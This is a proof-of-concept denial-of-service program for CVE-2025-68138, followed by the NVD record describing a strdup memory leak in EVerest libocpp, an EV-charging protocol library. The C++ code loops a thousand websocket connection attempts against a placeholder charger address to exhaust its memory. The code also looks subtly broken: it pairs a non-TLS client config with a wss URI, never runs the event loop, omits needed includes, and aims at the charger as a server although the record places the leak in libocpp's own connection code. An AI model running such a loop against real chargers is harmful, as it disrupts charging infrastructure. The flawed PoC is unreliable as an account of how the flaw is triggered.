CVE-2025-68138

// CVE-2025-68138 Memory Leak PoC // This PoC demonstrates the memory leak in EVerest libocpp websocket connections // Run multiple connection attempts to observe memory growth #include <websocketpp/client.hpp> #include <websocketpp/config/asio_client.hpp> typedef websocketpp::client<websocketpp::config::asio_client> client; int main() { try { client c; c.init_asio(); c.set_access_channels(websocketpp::log::alevel::all); c.clear_access_channels(websocketpp::log::alevel::frame_payload); websocketpp::lib::error_code ec; std::string uri = "wss://target-ev-charger/ws"; // Repeatedly attempt connections to trigger memory leak // Each strdup call in websocket_libwebsockets.cpp allocates memory // that is never freed for (int i = 0; i < 1000; i++) { websocketpp::lib::error_code ec; client::connection_ptr con = c.get_connection(uri, ec); if (ec) { std::cout << "Connection error: " << ec.message() << std::endl; continue; } c.connect(con); std::this_thread::sleep_for(std::chrono::milliseconds(100)); } // Observe memory usage increasing with each connection attempt // Memory will not be released due to missing free() calls } catch (websocketpp::exception const & e) { std::cout << "WebSocket exception: " << e.what() << std::endl; } return 0; }

{"cve": {"id": "CVE-2025-68138", "sourceIdentifier": "[email protected]", "published": "2026-01-21T20:16:06.007", "lastModified": "2026-02-06T21:22:15.583", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "EVerest is an EV charging software stack, and EVerest libocpp is a C++ implementation of the Open Charge Point Protocol. In libocpp prior to version 0.30.1, pointers returned by the `strdup` calls are never freed. At each connection attempt, the newly allocated memory area will be leaked, potentially causing memory exhaustion and denial of service. Version 0.30.1 fixes the issue."}, {"lang": "es", "value": "EVerest es una pila de software de carga de VE, y EVerest libocpp es una implementación en C++ del Protocolo de Punto de Carga Abierto. En libocpp, anterior a la versión 0.30.1, los punteros devueltos por las llamadas a `strdup` nunca se liberan. En cada intento de conexión, el área de memoria recién asignada se filtrará, lo que podría causar agotamiento de la memoria y denegación de servicio. La versión 0.30.1 corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:L", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:linuxfoundation:libocpp:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.30.1", "matchCriteriaId": "B5538681-05FD-4070-94F2-BAA9E6CDC81B"}]}]}], "references": [{"url": "https://github.com/EVerest/everest-core/security/advisories/GHSA-f8c2-44c3-7v55", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://github.com/EVerest/libocpp/blob/89c7b62ec899db637f43b54f19af2c4af30cfa66/lib/ocpp/common/websocket/websocket_libwebsockets.cpp", "source": "[email protected]", "tags": ["Product"]}]}}